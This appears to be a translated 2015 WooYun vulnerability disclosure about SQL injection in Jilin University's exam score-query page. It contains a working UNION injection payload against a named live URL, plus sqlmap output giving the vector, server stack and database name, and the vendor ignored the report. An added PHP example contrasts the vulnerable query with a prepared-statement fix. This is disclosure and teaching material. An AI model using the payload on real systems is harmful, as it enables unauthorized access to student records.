
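Vulnerability summary

Bug ID: wooyun-2015-0128118

Title: SQL injection vulnerability in the Jilin University Examination Center

Vendor: Jilin University Examination Center

Author: 路人甲

Submitted: 2015-07-21 17:51

Fixed: 2015-07-26 17:52

Disclosed: 2015-07-26 17:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organization (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]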



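Vulnerability details

Disclosure status:

2015-07-21: Details reported to the vendor; waiting for the vendor to handle them
2015-07-26: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

The score query interface of the Jilin University Examination Center has a SQL injection vulnerability

Detailed description: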

http://kszx.jlu.edu.cn/kscj/chaxun_result.php
(POST)
%E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0=1002' UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL#&%E9%80%89%E6%8B%A9%E6%9D%A1%E4%BB%B6=%E8%BA%AB%E4%BB%BD%E8%AF%81&%E6%9F%A5%E8%AF%A2%E5%8F%B7%E7%A0%81=123&Submit=%E6%9F%A5%E8%AF%A2%E6%88%90%E7%BB%A9

Proof of vulnerability:



-----
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0=1002' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7174776e71,0x6f57696f554150614141,0x716c627071),NULL,NULL,NULL#&%E9%80%89%E6%8B%A9%E6%9D%A1%E4%BB%B6=%E8%BA%AB%E4%BB%BD%E8%AF%81&%E6%9F%A5%E8%AF%A2%E5%8F%B7%E7%A0%81=123&Submit=%E6%9F%A5%E8%AF%A2%E6%88%90%E7%BB%A9
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL#
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL 5
Database: hwkszx
-----

Remediation:

you know.....

Copyright notice: when reposting, please credit the source 路人甲@乌云
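
Added example, not part of the original report and not the vendor's code: the concatenated-query pattern that makes a UNION injection like the one reported possible, next to the prepared-statement form that closes it. In-memory SQLite stands in for the MySQL back end, and the table, column and function names are hypothetical.

```php
<?php
// Added illustration. SQLite in memory stands in for the MySQL back end;
// the table, its columns and both function names are hypothetical.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE scores (id INTEGER, exam_name TEXT, id_type TEXT,
    id_number TEXT, student TEXT, score INTEGER, remark TEXT)');
$db->exec("INSERT INTO scores VALUES
    (1, '1002', 'id_card', '123', 'constructed student', 88, '')");

// Vulnerable pattern: request values are pasted into the SQL text, so a
// quote inside a value ends the string literal and the rest runs as SQL.
function lookup_concat(PDO $db, $exam, $number)
{
    $sql = "SELECT * FROM scores WHERE exam_name = '$exam'"
         . " AND id_number = '$number'";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: placeholders keep the values out of the SQL grammar,
// and an explicit column list returns only what the result page needs.
function lookup_prepared(PDO $db, $exam, $number)
{
    $stmt = $db->prepare('SELECT student, score FROM scores
        WHERE exam_name = ? AND id_number = ?');
    $stmt->execute(array($exam, $number));
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Same shape as the reported request value, adapted to SQLite:
// sqlite_version() replaces @@version and "-- " replaces the MySQL "#".
$value = "1002' UNION ALL SELECT NULL,NULL,NULL,sqlite_version(),"
       . "NULL,NULL,NULL-- ";

// Concatenated: the stored row plus one attacker-shaped row come back.
$rows = lookup_concat($db, $value, '123');
printf("concatenated query: %d rows\n", count($rows));
foreach ($rows as $row) {
    printf("  column 4 = %s\n", var_export($row[3], true));
}

// Prepared: the whole value is compared as a literal exam name, no match.
$safe = lookup_prepared($db, $value, '123');
printf("prepared query: %d rows\n", count($safe));
```

On the PHP and MySQL stack the sqlmap output identifies, the same change is a PDO or mysqli prepared statement, ideally with a database account that can read only the tables the query page needs.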


Vulnerability response

Vendor response:

Severity: No impact; ignored by vendor

Ignored at: 2015-07-26 17:52

Vendor reply:

Latest status:

None yet